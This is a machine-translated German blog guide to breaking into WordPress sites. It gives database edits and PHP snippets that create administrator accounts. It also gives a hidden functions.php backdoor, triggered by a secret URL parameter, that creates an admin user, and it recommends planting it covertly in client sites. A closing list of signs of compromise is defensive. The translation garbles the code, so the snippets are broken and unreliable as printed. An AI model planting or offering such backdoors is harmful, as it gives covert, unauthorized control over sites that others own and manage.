Wie man sich in eine WordPress-Website hackt, The Complete Guide

Wie man sich in eine WordPress-Website hackt, die komplette Anleitung


Wir dulden, genehmigen oder fördern kein illegales oder böswilliges Verhalten! In diesem Artikel wird erläutert, wie Sie den Zugriff auf eine WordPress-Site, die Ihnen gehört oder die Sie zum Bearbeiten, Verwalten und Zugreifen haben, hacken oder wiedererlangen können. Was auch immer Sie tun, Sie tun es selbst. Wir sind nicht für Ihre Handlungen verantwortlich. Dieser Leitfaden dient nur zu Bildungszwecken.

Mit den beschriebenen Methoden können Sie auch dann wieder auf die Website zugreifen, wenn Sie kein Konto mehr haben. Sie benötigen jedoch einige Informationen über die Website und helfen Ihnen nicht dabei, sich in eine zufällige WordPress-Installation zu hacken.

In diesem Handbuch zeigen wir Ihnen Folgendes:

  • Wie man sich in eine WordPress-Website hackt
  • So erstellen Sie eine Hintertür in WordPress
  • So erstellen Sie ein neues Benutzerkonto über FTP
  • 10 Zeichen, dass Ihre WordPress-Site gehackt wird

Wie man sich in eine WordPress-Website hackt, die komplette Anleitung

Situationen, in denen Sie sich selbst helfen können

Wenn Sie sich in einer der folgenden Situationen befinden, können Sie mit unseren Methoden den Zugriff wiedererlangen:

  • Sie haben den Benutzernamen oder die E-Mail-Adresse vergessen
  • Die Option zum Zurücksetzen des Kennworts funktioniert auf dem Hosting-Server nicht
  • E-Mails zum Zurücksetzen des Passworts kommen nicht durch
  • Sie haben keinen Zugriff mehr auf die E-Mail-Adresse des Kontos
  • Sie kennen den Benutzernamen und das Passwort, aber die Kombination funktioniert einfach nicht

Um die unten beschriebenen Methoden verwenden zu können, benötigen Sie nur eine der folgenden::

  • FTP-Zugriff auf den Server oder
  • cPanel-Zugriff auf den Server oder
  • Zugriff auf die MySQL-Datenbank und die Möglichkeit, eine Remoteverbindung herzustellen

Methode 1 – der MySQL-Weg

Verwenden Sie diese Methode, um das Kennwort (oder bei Bedarf den Benutzernamen) eines vorhandenen Benutzers zu ändern oder ein neues Konto zu erstellen. Sie benötigen einen cPanel-Zugriff oder einen direkten MySQL-Zugriff auf die Datenbank der Site. Beginnen wir mit dem Ändern des Passworts eines vorhandenen Benutzers.

Wenn Sie cPanel verwenden, melden Sie sich an (auf cPanel kann immer über das zugegriffen werden https://yoursite.com:2083 Link), suchen und öffnen Sie phpMyAdmin. Die Liste der Datenbanken und Tabellen befindet sich links. Sie suchen nach dem Tisch, der endet Benutzer. Es wird wahrscheinlich sein wp_users, Wenn Sie jedoch mehr als eine WordPress-Site auf dem Server installiert haben, müssen Sie die richtige finden.

In der richtigen Tabelle befindet sich der Benutzer, den Sie bearbeiten möchten. Gehen Sie genauso vor, wenn Sie über einen externen Client wie MySQL eine Verbindung herstellen SQLyog. Sobald Sie die Tabelle und den tatsächlichen Benutzerdatensatz gefunden haben, ist es Zeit, das Kennwort zu ändern.

Wie Sie wahrscheinlich inzwischen herausgefunden haben, wird das Passwort im gespeichert Benutzerpass Feld, gehasht mit dem MD5-Algorithmus. Öffne das Online-MD5-Generator Geben Sie das Passwort ein, das Sie verwenden möchten, und klicken Sie auf “Hash”.. Kopieren Sie die generierte Zeichenfolge und ersetzen Sie das ursprüngliche Kennwort damit. In phpMyAdmin können Sie das Feld bearbeiten, indem Sie darauf doppelklicken. Die Vorgehensweise ist bei anderen MySQL-Clients ähnlich. Speichern Sie die Änderungen und melden Sie sich mit Ihrem neuen Passwort bei WordPress an.

WP-Benutzertabelle

Benutzernamen, Hash-Passwörter und E-Mails werden in der gespeichert wp_users Datenbanktabelle

Immer noch bei Methode 1 – Erstellen eines neuen Benutzers

Das Erstellen eines neuen Benutzers ist etwas komplizierter, aber in weniger als einer Minute noch zu verwalten. Erstellen Sie einen neuen Datensatz in der Benutzertabelle und füllen Sie Folgendes aus: user_login, user_pass (gehasht mit der oben beschriebenen MD5-Funktion) und user_email. Alle anderen Felder können leer bleiben. Sie spielen keine Rolle. Speichern Sie den neuen Datensatz. Nach dem Speichern gibt MySQL ihm eine eindeutige ID. Dies ist die Nummer im ID-Feld. Erinnere dich dran.

Jetzt geh zu _usermeta Tabelle. Merken, Das Präfix der Tabelle muss mit dem der Benutzer übereinstimmen. Zum Beispiel wp_users und wp_usersmeta. Wenn das Präfix nicht identisch ist, bearbeiten Sie die falsche Tabelle (einer anderen WP-Installation) und das neue Konto funktioniert nicht. Wir werden zwei neue Datensätze erstellen. Ignoriere das umeta_id Feld für beide. einstellen Benutzeridentifikation Feld auf den Wert, an den Sie sich gerade erinnert haben (der neue ID-Wert in der Benutzertabelle). Für den ersten Datensatz meta_key zu wpct_user_level und meta_value zu 10. Für den zweiten meta_key zu wpct_capabilities und meta_value zu a: 1: {s: 13: "Administrator"; b: 1;}. Speichern Sie beide. Sie sind fertig – melden Sie sich an!

Methode # 2 – die Funktion functions.php

Dieser Ansatz kann entweder durch Bearbeiten von functions.php über cPanel oder durch Verwendung eines FTP-Clients verwendet werden. Wenn Sie cPanel verwenden, suchen Sie den Dateimanager und öffnen Sie ihn. Zuerst müssen wir den Ordner des aktiven Themas finden.

Gehe zu public_html / wp_content / themes Mappe. Wenn Sie Ihr Thema sofort sehen und wissen, welches es ist – großartig. Öffnen Sie den Ordner und beginnen Sie mit der Bearbeitung functions.php. Wenn nicht, öffnen Sie die Site, klicken Sie mit der rechten Maustaste auf eine beliebige Stelle und wählen Sie “Quelle anzeigen”. Drücken Sie dann Strg + F und beginnen Sie mit der Eingabe / Themen / Bald werden viele URLs hervorgehoben und Sie werden den Ordnernamen des aktiven Themas erkennen.

Suchen Sie es in der Dateistruktur, öffnen Sie es und beginnen Sie mit der Bearbeitung functions.php. Kopieren Sie den folgenden Code am Ende der Datei. Kümmere dich um das Schließen ?> PHP-Tags, wenn Sie sie haben. Sie müssen in der letzten Zeile stehen. Fügen Sie also den Code vor ihnen ein.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (Array ('ID' => $ user_id, 'nickname' => $ new_user_email));

$ user = neuer WP_User ($ user_id);
$ user-> set_role ('Administrator');
}}

Bearbeiten Sie nur die ersten beiden Zeilen des Codes, um Ihr neues Konto wiederzugeben. Wenn in WP bereits ein Benutzer mit dieser E-Mail-Adresse vorhanden ist, wird kein neues Konto erstellt. Stellen Sie daher sicher, dass es neu ist. Ändern Sie auch das Passwort – lassen Sie sich nicht von Script-Kiddies hacken. Nachdem Sie die Datei gespeichert haben, öffnen Sie einfach Ihre Site. Der Code wird ausgeführt, ein neues Konto mit Administratorrechten erstellt und Sie können sich damit anmelden.

Denken Sie danach daran, den Code aus zu löschen functions.php.

Andere Hacking-Methoden

Wenn Sie das FTP-, cPanel- oder MySQL-Passwort kennen, beweisen Sie, dass Sie ein legitimes Zugriffsrecht auf den Server haben und daher auch Zugriff auf die WordPress-Installation (en) haben sollten. Wenn Sie keines dieser Konten haben, haben Sie nichts Gutes (Hacken in Websites anderer Personen), und das ist nicht schön!

Bitte denken Sie daran, dass der unbefugte Zugriff auf Computer, Websites oder Server ein schweres Verbrechen darstellt und in den meisten Ländern umgehend behoben wird.

Wenn Sie Angst haben, dass Ihre WordPress-Site gehackt werden kann, überprüfen Sie diese Seite mit dem kostenlosen WordPress-Sicherheitsscanner. Wenn Sie keine Zeit haben, Ihr Blog einzurichten, lassen Sie es uns für Sie tun.

So erstellen Sie eine Hintertür in WordPress

Wenn die Vordertür geschlossen ist, können Sie die Hintertür ausprobieren. Dies mag sich nach einer böswilligen Methode anhören, den Code für die Eingabe der Site zu verwenden, ohne Zugriff darauf zu haben. Es gibt jedoch Zeiten, in denen Sie Ihre eigene Site kontrollieren müssen, wenn jemand sie gestohlen hat.

Wenn Sie Websites für andere Personen erstellen, die Sie tun, wird es früher oder später einen Kunden geben, der sich weigert, Sie für Ihre Arbeit zu bezahlen. Ein Kunde, der Ihre Anmeldeinformationen löscht und die Kontrolle über alles übernimmt, was Sie getan haben. Manchmal reicht es aus, einen neuen Benutzer über FTP zu erstellen oder ein Passwort zurückzusetzen. Wenn das nicht genug ist, Vielleicht möchten Sie sich zurückhacken oder einen Backdoor-Zugriff auf Ihre Administrationsseiten erstellen.

Aber wenn Sie sich entschieden haben, ein kleines Stück Code in Ihrer WordPress-Umgebung zu verstecken, können Sie sich Würde und Würde sparen Erhalten Sie Zugriff auf die WordPress-Site mit Administratorrechten. Und hier beginnen die Spiele.

Unabhängig davon, wie oft dieser Dieb Ihre Informationen löscht oder ein Backup auf einem Server wiederherstellt, den er wahrscheinlich besitzt, besteht die Möglichkeit, dass er nichts über Backdoor-Eingänge weiß. Wenn er das tun würde, würde er wahrscheinlich nicht einmal Ihre Hilfe beim Einrichten von WordPress brauchen, richtig?

Erstellen Sie eine Hintertür:

OK, genug mit dem Gespräch; Hier ist ein Code, den Sie benötigen, um die Arbeit zu erledigen:

  1. Öffnen Sie die Datei functions.php
  2. Kopieren / Einfügen des folgenden Codes:
  3. add_action ('wp_head', 'wploop_backdoor');
    Funktion wploop_backdoor () {
    If ($ _GET ['backdoor'] == 'knockknock') {
    require ('wp-includes / register.php');
    If (! Username_exists ('username')) {
    $ user_id = wp_create_user ('name', 'pass');
    $ user = neuer WP_User ($ user_id);
    $ user-> set_role ('Administrator');
    }}
    }}
    }}
    ?>
  4. Änderungen speichern

Wenn Sie den Code unverändert lassen, müssen Sie nur besuchen, um einen neuen Administrator auf der Website zu erstellen http://www.yourdomain.com/?backdoor=knockknock

Nachdem die Seite geladen wurde, lautet Ihr neuer Benutzername “Name” und Passwort “bestehen”.

Na sicher, Sie können das im Code ändern oben durch Ändern von “Name” und “Pass” zu was auch immer du willst. Sie können den Link zu Ihrer Hintertür auch ändern, indem Sie “Hintertür” und / oder “Klopfen” auf alles ändern, was Sie sich einfallen lassen.

Probieren Sie die Funktion aus – sie macht nicht nur Spaß, sondern kann Ihnen auch in Zukunft wirklich helfen, wenn Sie eine Website für jemanden erstellen möchten, dem Sie nicht vollständig vertrauen können. Sie sollten auch Ihre WordPress- und Blogging-Fähigkeiten verbessern.

So erstellen Sie ein neues Benutzerkonto über FTP

Das Erstellen neuer Benutzerkonten in WordPress ist sehr einfach. Als Administrator müssen Sie Navigieren Sie zur Benutzeradministrationsseite Hier können Sie ein neues Konto für jede Benutzerrolle erstellen. Dies kann in Sekundenschnelle erledigt werden und ein neu erstellter Benutzer kann sich sofort mit dem angegebenen Benutzernamen und Passwort anmelden.

Aber was passiert, wenn Sie den Zugriff auf Ihren WordPress-Administrator verlieren? Die Dinge könnten etwas komplizierter werden, aber keine Sorge – wir haben eine Funktion für Sie, die Ihr Administratorleben retten kann.

Unabhängig davon, ob ein anderer Administrator Ihr Konto gelöscht hat, ob Sie versehentlich alle Benutzer aus der Datenbank gelöscht, ein fehlerhaftes Plugin verwendet oder gehackt haben, können Sie die Kontrolle behalten. Manchmal können Sie möglicherweise nur auf Ihren FTP-Server zugreifen, während der HTTP-Server außerhalb Ihrer Reichweite liegt und Sie einen neuen Administrator erstellen müssen. Während dies ein seltener Fall sein kann, werden Sie mit der folgenden Funktion gerettet.

So erstellen Sie ein neues Konto außerhalb der WordPress-Administratorumgebung, Sie benötigen lediglich einen FTP-Zugang zu Ihrer Site. Als Administrator sollten Sie über alle erforderlichen Informationen verfügen, um sich bei Ihrem Server anzumelden, und Sie können schnell ein neues Konto erstellen, indem Sie eine neue Funktion in Ihrem Thema erstellen.

Erstellen Sie ein neues Benutzerkonto über FTP:

  1. Öffnen Sie den FTP-Client und stellen Sie eine Verbindung zu Ihrem Konto her
  2. Navigieren Sie zu wp-content / theme
  3. Öffnen Sie den Ordner des verwendeten Themas
  4. Suchen Sie nach der Datei functions.php und bearbeiten Sie sie
  5. Kopieren Sie die folgende Funktion und fügen Sie sie ein:
  6. Funktion admin_account () {
    $ user = 'Benutzername';
    $ pass = 'Passwort';
    $ email = '[email protected]';
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = neuer WP_User ($ user_id);
    $ user-> set_role ('Administrator');
    }}
    add_action ('init', 'admin_account');
    
  7. Ändern Sie Benutzername, Passwort und E-Mail in etwas Einzigartiges
  8. Änderungen speichern

Stellen Sie sicher, dass Benutzername, Passwort und E-Mail-Adresse, die Sie in der Funktion festgelegt haben, eindeutig sind Andernfalls funktioniert die Funktion nicht ordnungsgemäß. Sobald Sie die Änderungen gespeichert haben, sind Sie fertig und können zu Ihrem WP-Anmeldefenster navigieren. Verwenden Sie neue Informationen, um sich erneut anzumelden. Sobald Sie das Konto überprüft haben, können Sie die Funktion aus der Datei functions.php löschen.

Mit der oben gezeigten Funktion wird ein Administratorkonto erstellt. Sie können es jedoch leicht ändern, um ein Konto mit einer anderen Benutzerrolle zu erstellen. Einfach Ändern Sie die Rolle auf der 8th Reihe des Codes an den Herausgeber, Autor, Mitwirkenden, Abonnenten oder eine andere von Ihnen erstellte Benutzerrolle.

Wenn Sie Ihr Administratorkonto verloren haben, haben Sie leider auch alle Beiträge verloren, die unter diesem Benutzernamen geschrieben wurden. Aus diesem Grund sollten Sie immer ein Backup aufbewahren, das Sie problemlos abrufen können. Wenn Sie dies lesen, während Sie über Ihr Administratorkonto verfügen, Nehmen Sie dies als Erinnerung, um sofort ein Backup zu erstellen und setzen Sie ein Lesezeichen für diesen Artikel, falls Sie in Zukunft ein Konto außerhalb von WordPress erstellen müssen.

10 Zeichen, dass Ihre WordPress-Site gehackt wird

WordPress ist eine riesige Blogging-Plattform. Es gibt Millionen von Benutzern und es scheint, dass die Anzahl von Tag zu Tag schnell wächst. Menschen neigen sogar dazu, ihre in anderen Content-Management-Systemen erstellten Websites häufiger auf dieses Open-Source-System zu übertragen, als Sie vielleicht denken. Und obwohl dies gut ist, bedeutet dies, dass Hacker werden WordPress auch an die erste Stelle setzen, wenn sie versuchen, in zufällige Websites einzudringen.

Wenn Sie gehackt werden, wissen Sie normalerweise sofort davon. Ihre Site wird unzugänglich. Sie können sich nicht anmelden und manchmal hinterlässt ein Hacker sogar eine Nachricht auf der Startseite. Aber meistens nicht, Sie werden vielleicht gar nicht bemerken, dass sich etwas geändert hat. In diesem Teil des Artikels zeigen wir Ihnen einige Anzeichen, die Ihnen möglicherweise zeigen, dass Ihre WordPress-Site gehackt wurde, und einige Lösungen für das Problem.

1. Anmeldung nicht erfolgreich

Dieses Zeichen ist ziemlich offensichtlich. Wenn Sie eine Zeit lang eine Kombination aus Benutzername und Passwort verwendet haben, ohne jemals Probleme zu haben, können Sie misstrauisch werden, wenn WordPress Ihr Konto plötzlich nicht mehr erkennt. Wenn sich ein Hacker auf Ihrer Website anmelden muss, besteht die Möglichkeit, dass er Ihre Administratorrechte schnell ändert.

Vielleicht muss er Ihr Passwort ändern oder Ihr Konto vollständig löschen. Bevor Sie nach der ersten Meldung von WordPress über einen falschen Benutzernamen / ein falsches Passwort in Panik geraten, sollten Sie berücksichtigen, dass Sie möglicherweise eine falsche Kombination eingegeben oder die Feststelltaste aktiviert haben.

Lösung: Versuchen Sie, das Kennwort per E-Mail wiederherzustellen, oder verwenden Sie ein anderes Konto, um sich erneut anzumelden. Um sicherzustellen, dass Ihre Anmeldung sicher bleibt, empfehlen wir die Installation Login Ninja Plugin für WordPress.

2. Ihrer Website werden schädliche Inhalte hinzugefügt

Die Site enthält eine Malware-Warnung

Wenn Sie unbekannte Inhalte auf Ihrer Website bemerken, können Sie sich Sorgen machen. Wenn sie die Möglichkeit haben, auf Ihren Administrationsbereich zuzugreifen, Hacker können Ihren Kern sowie Ihre Theme- und Plugin-Dateien ändern. Das bedeutet, dass sie alles ändern können, was sie wollen.

Während einige Hacker das Aussehen Ihrer Website drastisch verändern und vielleicht sogar darauf hinweisen, dass Sie gehackt wurden, sind die anderen viel subtiler.

Lösung: Versuchen Sie, im Website-Code nach versteckten Inhalten zu suchen. Möglicherweise befinden sich Links zu Hackern bösartiger Websites in der Fußzeile Ihrer Website, oder sie haben Popups installiert, die Ihren Kunden regelmäßig geöffnet werden. Verwenden Sie Security Ninja, um Ihre Site zu scannen oder Ihre Site kontinuierlich auf solche Probleme zu überwachen.

3. Verdächtige Besuche

Wenn Sie Ihre Website nicht verfolgen, sollten Sie sofort damit beginnen. Eine einfache Möglichkeit ist die Verwendung von Google Analytics, mit dem Sie neben vielen anderen Funktionen feststellen können, wie viele Besuche Sie erhalten und woher diese Besuche stammen. Nach einiger Zeit lernen Sie Ihre Website kennen. Das bedeutet, dass Sie wissen, woher die Besuche kommen, wann Sie eine neue Kampagne starten und wann neue Werbelinks in freier Wildbahn veröffentlicht werden.

Wenn Sie jedoch plötzlich feststellen, dass Ihre Website eine große Anzahl neuer Besuche von der verdächtigen Domain erhält, Sie sollten dies weiter untersuchen, da Ihre Website möglicherweise nur gehackt wird. Normalerweise führt diese Art von Besuchen zu einer Absprungrate von 100%, was bedeutet, dass nur auf eine Seite zugegriffen wurde. Hacker verwenden häufig automatisierte Systeme, die andere schlechte Websites zu Ihren führen. Unabhängig davon, ob es sich um den fehlerhaften Code handelt, der auf Ihrer Website ausgeführt wird, oder ob Sie Teil eines Spam-Netzwerks geworden sind, kann es ernst werden, und Sie müssen Ihre Website auf schädlichen Code überprüfen.

Lösung: Verwenden Google Webmasters Tools verdächtige Domains zu finden

4. Ein plötzlicher Rückgang des Verkehrs

Sicheres Surfen Ssite-Status

Im Gegensatz zu dem zuletzt erwähnten Zeichen, gehackt zu werden, könnte dieses Sie alarmieren, da die Anzahl der Besuche plötzlich abnimmt. Anstatt neue Besuche an Sie weiterzuleiten, Ein Hacker sendet möglicherweise Besuche von Ihrer Website weg. Dies kann passieren, weil ein Hacker Ihre Site auf eine andere umgeleitet hat. Der andere Grund für weniger Besucher ist, dass Google Ihre Website auf die schwarze Liste gesetzt hat. Diese Aktion zeigt jedem Benutzer eine Nachricht an, der Ihre Website möglicherweise nicht öffnet, weil sie infiziert ist.

Lösung: Verwenden Sie Google Status der sicheren Browsing-Site um zu überprüfen, ob Ihre Website als unsicher markiert ist und derzeit gefährlich zu besuchen ist.

5. Suchmaschinenergebnisse sind seltsam

Wenn Sie keine Änderungen auf Ihrer Website bemerkt haben, aber feststellen, dass die Suchergebnisse in Google und anderen Suchmaschinen seltsam sind (unterschiedliche Titel und andere Metadaten anzeigen), ist dies möglicherweise ein deutliches Zeichen für eine gehackte Website. Ein Hacker hat Ihren Inhalt möglicherweise so geändert, dass er nur für einen Experten sichtbar ist. Die Änderung wäre jedoch in den Suchmaschinenergebnissen sichtbar.

Lösung: Überprüfen Sie Ihre Website mit Google Webmasters Tools, und überprüfen Sie, ob Ihre Website damit gehackt wurde kostenloses Online-Tool.

6. Sie können keine E-Mails senden / empfangen

Sobald ein Hacker Zugriff auf Ihre Website erhält, wird er dies wahrscheinlich wollen Verwenden Sie Ihren Server zum Spammen aller anderen. Wenn Sie feststellen, dass Sie keine neuen E-Mails von Ihrem WordPress senden oder empfangen können, kann dies ein klares Zeichen dafür sein, dass Sie gehackt wurden. Überprüfen Sie Ihre E-Mails erneut und wenden Sie sich dann an Ihren Anbieter, um sicherzustellen, dass keine Fehler vorliegen.

Lösung: Testen Sie Ihr WordPress Mail-Funktion mit diesem kostenlosen Plugin.

7. Site existiert nicht

Server nicht gefunden

Es gibt Zeiten, in denen Hacker nicht auf Ihre Website zugreifen, um schädlichen Code zu pflanzen, Benutzer umzuleiten oder Ihre E-Mail für Spam zu verwenden. Manchmal, Alles, was sie tun möchten, ist, Ihre Website zum Absturz zu bringen. In seltenen Fällen löscht ein Hacker erfolgreich alles vom gesamten Server. Aus diesem Grund ist es wichtig, dass Sie Ihre Dateien bei einem renommierten Hosting-Unternehmen hosten, das die Sicherheit übernimmt und auch tägliche oder mindestens wöchentliche Backups Ihrer Website erstellt. Es wird empfohlen, von Zeit zu Zeit auch eigene Backups zu erstellen, damit die Site schnell wiederhergestellt werden kann.

Lösung: Installieren Sie eines der besten Plugins für das Backup-Management in WordPress.

8. Verdächtige Dateien

Ähnlich wie bei schädlichen Inhalten, die vorhandenen Dateien hinzugefügt werden können, Ein Hacker kann zusätzliche Dateien an einer beliebigen Stelle in Ihrem Stammordner platzieren. Es ist eine gute Sache, sich mit WordPress vertraut zu machen. Wenn Sie jedoch nicht so erfahren sind, sollten Sie über ein Sicherheitstool verfügen, mit dem Sie alle Ihre Dateien und Aktivitäten überprüfen können. Kürzlich haben wir den Security Ninja getestet, ein perfektes Tool zum Überprüfen aller Ihrer WordPress-Dateien.

Lösung: Suchen Sie nach Dateien, die nicht zu Ihrer WordPress-Installation gehören. Verwenden Sie Security Ninja, um Ihre Site regelmäßig zu scannen und diese Dateien automatisch zu finden. Löschen Sie dann die Dateien oder entfernen Sie den Schadcode aus infizierten Dateien. Vergessen Sie nicht das Core Scanner-Add-On für Security Ninja.

9. Neue Mitglieder

Abhängig von Ihrer Site sind Sie möglicherweise der einzige, der neue Mitglieder hinzufügen kann. In diesem Fall kann eine E-Mail, die Sie über neu registrierte Benutzer informiert, einen Alarm auslösen. Wenn es andere Administratoren gibt, die neue Mitglieder hinzufügen können, erkundigen Sie sich bei ihnen nach verdächtigen Aktivitäten.

Lösung: Ändern Sie die Anmelde-URL mit einem kostenlosen Plugin, beschränken Sie den Zugriff auf Ihre WordPress-Anmeldeseite mithilfe der .htpasswd-Datei und verwenden Sie Login Ninja, um Ihr Anmeldeformular jederzeit zu schützen.

10. Überprüfen Sie geplante Ereignisse auf Ihrem Server

Manchmal macht ein Hacker nichts mit Ihrer Website, sobald er seinen Weg gefunden hat. Stattdessen, Sie werden geplante Ereignisse verlassen Dies kann Ihrer Website irgendwann in der Zukunft schaden. Diese Technik ist gefährlich, da ein Hacker unerfahrene Opfer zunächst ahnungslos lassen kann. Sie sind möglicherweise infiziert und wissen nichts darüber.

Lösung: Überprüfen Sie Ihre CRON-Jobs auf einem Server, den Sie verwenden, und stellen Sie sicher, dass keine verdächtigen geplanten Aufgaben vorhanden sind.

Einpacken

Wir hoffen, dass dieser Artikel Ihnen hilft, eine noch sicherere WordPress-Site zu verwalten, und dass er Ihnen hilft, in schlechten Situationen wieder darauf zuzugreifen. Und Auch wenn Ihre Website sauber ist, halten Sie dies bitte nicht für selbstverständlich.
Stellen Sie immer sicher, dass Ihr Blog so sicher wie möglich ist. Wir empfehlen Sicherheits-Plugins für WordPress, mit denen Sie meistens sparen können. Verwenden Sie dennoch kein unsicheres Passwort und seien Sie vorsichtig, wenn Sie sich in Ihre eigene WordPress-Site hacken.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map